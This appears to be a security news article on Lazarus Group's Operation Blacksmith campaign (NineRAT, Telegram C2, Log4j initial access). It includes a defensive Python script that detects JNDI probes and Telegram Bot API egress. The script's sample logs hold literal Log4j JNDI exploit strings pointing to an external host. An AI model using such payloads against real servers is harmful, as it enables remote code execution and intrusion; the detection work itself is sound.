Telegram Trojan: Lazarus Leverages NineRAT in Operation Blacksmith

In the ever-evolving landscape of cyber threats, the Lazarus Group stands as a formidable name, notorious for its sophisticated attacks and elusive tactics. Its latest campaign, dubbed “Operation Blacksmith” and recently uncovered by Cisco Talos, has made headlines, showcasing the group’s unrelenting pursuit of cyber dominance.

“Operation Blacksmith” is an intricate campaign employing at least three novel DLang-based malware families, two of which are remote access trojans (RATs). The most intriguing aspect is the use of Telegram bots and channels for command and control communications, with the Telegram-based RAT named “NineRAT.” This innovative approach demonstrates Lazarus Group’s aptitude in leveraging legitimate services to evade detection.

Typical infection chain observed in Operation Blacksmith | Image: Cisco Talos

Lazarus Group’s evolution in tactics is indicative of the strategic shifts in the cyber espionage landscape. As a North Korean APT group, they’ve been linked to the Onyx Sleet subgroup, sharing tactics, techniques, and procedures. This alliance highlights the complex nature of state-sponsored cyber operations, where subgroups support varied objectives from politics to national security.

The group’s targets span the globe, from manufacturing to agriculture, and initial access comes through publicly known vulnerabilities such as CVE-2021-44228 (Log4j). This opportunistic approach, targeting enterprises with exposed infrastructure, shows their adaptability and relentless pursuit of exploitable weaknesses.

NineRAT, a key tool in this campaign, was first built in May 2022 and deployed against a South American agricultural organization in March 2023. It signifies a shift towards using non-traditional frameworks for malware development. Alongside NineRAT, other tools like “DLRAT” and “BottomLoader” add to their arsenal, each serving distinct malicious purposes.

Using Telegram as a C2 channel is a cunning move by Lazarus, aiming to blend in with legitimate traffic to evade network and host-based detection. This method exemplifies the group’s innovative approach to maintaining stealth in their operations.
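The two stages the article describes, Log4j exploitation for initial access and a Telegram-based RAT for command and control, both leave traces a defender can look for. The following is an added example, not code from the article or from Cisco Talos, that runs two simple detection rules over constructed sample logs: one flags JNDI lookup strings of the kind used against CVE-2021-44228 in web-server access logs, the other flags outbound use of the Telegram Bot API in proxy logs and summarises which hosts and processes are calling which bot methods. The log formats, host names, process names and the token value are all invented for the example; the assumed URL shape for the Bot API (api.telegram.org/bot&lt;token&gt;/&lt;method&gt;) is the public one, but whether NineRAT uses exactly that shape is not stated in the article.

```python
import re
from collections import Counter, defaultdict
from typing import Dict, List

# Rule 1: JNDI lookup strings of the kind sent to trigger CVE-2021-44228 (Log4j).
# Case-insensitive, so mixed-case variants are caught too. Any request field
# that an application might log (path, headers, user agent) can carry one.
JNDI_RE = re.compile(r"\$\{\s*jndi\s*:\s*(ldap|ldaps|rmi|dns|iiop)\s*:", re.IGNORECASE)

# Rule 2: Telegram Bot API egress. ASSUMED URL shape: /bot<token>/<method>
# under api.telegram.org. Ordinary Telegram clients do not use this path
# prefix, so seeing it from a server or an unexpected process is worth a look.
BOT_API_RE = re.compile(r"^/bot[^/\s]+/(\w+)", re.IGNORECASE)

# Constructed key=value proxy log format used only for this example.
PROXY_RE = re.compile(
    r"^(?P<ts>\S+)\s+host=(?P<host>\S+)\s+proc=(?P<proc>\S+)\s+dst=(?P<dst>\S+)\s+url=(?P<url>\S+)"
)

# Constructed web-server access log lines (not taken from the Talos report).
WEB_LOG = [
    '10.0.0.5 - - [02/Mar/2023:10:15:01 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [02/Mar/2023:10:15:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [02/Mar/2023:10:15:09 +0000] "GET /?x=${JNDI:rmi://198.51.100.7/x} HTTP/1.1" 404 0 "-" "curl/8.0"',
]

# Constructed proxy log lines. The token value is a placeholder, not a real token.
PROXY_LOG = [
    "2023-03-02T10:20:11Z host=app-srv-01 proc=updater.exe dst=api.telegram.org url=/bot123456:PLACEHOLDER_TOKEN/getUpdates",
    "2023-03-02T10:20:12Z host=ws-14 proc=chrome.exe dst=web.telegram.org url=/",
    "2023-03-02T10:20:20Z host=ws-14 proc=Telegram.exe dst=api.telegram.org url=/",
    "2023-03-02T10:20:41Z host=app-srv-01 proc=updater.exe dst=api.telegram.org url=/bot123456:PLACEHOLDER_TOKEN/getUpdates",
    "2023-03-02T10:20:45Z host=app-srv-01 proc=updater.exe dst=api.telegram.org url=/bot123456:PLACEHOLDER_TOKEN/sendDocument",
]


def find_jndi_probes(lines: List[str]) -> List[Dict[str, str]]:
    """Return each access-log line carrying a JNDI lookup string, with its scheme."""
    hits = []
    for line in lines:
        m = JNDI_RE.search(line)
        if m:
            hits.append({"line": line, "scheme": m.group(1).lower()})
    return hits


def find_telegram_bot_egress(lines: List[str]) -> List[Dict[str, str]]:
    """Return each proxy-log line that calls the Telegram Bot API, with host, process and method."""
    hits = []
    for line in lines:
        m = PROXY_RE.match(line)
        if not m or m["dst"].lower() != "api.telegram.org":
            continue
        b = BOT_API_RE.match(m["url"])
        if not b:
            continue  # plain client traffic to the API host, not a bot call
        hits.append({"host": m["host"], "proc": m["proc"], "method": b.group(1)})
    return hits


def summarize_bot_egress(lines: List[str]) -> Dict[str, Dict[str, int]]:
    """Count Bot API methods per host; repeated polling from one host is the signal to triage."""
    per_host: Dict[str, Counter] = defaultdict(Counter)
    for hit in find_telegram_bot_egress(lines):
        per_host[hit["host"]][hit["method"]] += 1
    return {host: dict(counts) for host, counts in per_host.items()}


if __name__ == "__main__":
    for hit in find_jndi_probes(WEB_LOG):
        print("JNDI probe (%s):" % hit["scheme"], hit["line"])
    for host, counts in summarize_bot_egress(PROXY_LOG).items():
        print("Telegram Bot API calls from %s:" % host, counts)
```

Both rules are deliberately coarse. The JNDI rule is a first-pass filter that will still miss heavily obfuscated lookups and should be paired with patching; the Bot API rule does not try to decide whether a given bot call is malicious, it only surfaces the hosts and processes making such calls so an analyst can compare them against what the organisation actually expects to talk to Telegram.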

Operation Blacksmith is a testament to Lazarus Group’s growing sophistication and adaptability. Their ability to use novel methods and tools poses a significant challenge for cybersecurity defenses worldwide. As they continue to evolve, the cybersecurity community must remain vigilant and innovative to counter such advanced threats.

The Lazarus Group’s Operation Blacksmith is more than just a series of cyberattacks; it’s a wake-up call for organizations globally. It highlights the need for robust cybersecurity measures and continuous monitoring to defend against such advanced and evolving threats.